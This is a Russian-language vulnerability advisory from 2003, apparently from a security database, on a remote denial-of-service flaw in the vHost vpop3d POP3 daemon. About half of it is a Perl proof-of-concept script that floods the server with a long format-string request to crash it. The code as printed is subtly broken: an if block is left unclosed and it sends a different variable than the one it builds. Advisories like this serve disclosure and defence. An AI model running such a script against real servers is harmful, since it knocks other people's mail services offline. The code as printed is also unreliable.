Удаленное переполнение буфера в в vHost в POP3 демоне
| Дата публикации: | 21.08.2003 |
| Всего просмотров: | 1209 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Chaogic Systems vHost 3.x |
| Описание: | Отказ в обслуживании обнаружен в vHost в POP3 демоне. Удаленный пользователь может аварийно завершить работу POP3 службы.
Удаленный пользователь может послать длинный запрос к vpop3d POP3 серверу, чтобы аварийно завершить работу демона. Перед аварийным завершением работы, демон выдаст следующую ошибку: "-ERR POP3 Server Abnormal Shutdown: Timeout waiting for command from client" Уязвимость обнаружена в vHost POP Server 3.05r3 Способов устранения обнаруженной уязвимости не существует в настоящее время. Эксплоит:
#!/usr/bin/perl
#vpop3d Denial Of Service..
#Proof of Concept script..
#Deadbeat, uk2sec..
#e: deadbeat@sdf.lonestar.org
#e: daniels@legend.co.uk
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
if(!$ARGV[1]){
die "usage: perl $0 <host> <port>\n";
$dos = "%s%s"x5000;
$req = "USER $dos";
$sox = IO::Socket::INET->new(
Proto=>"tcp",
PeerPort=>$port,
PeerAddr=>$host
)or die "can't connect to $host : $port\n";
sleep 2;
print $sox $dos;
sleep 1;
print "done..vpop3d should lock now :)\n";
|
| Ссылки: | Vhost-3.05rc3 DOS.. |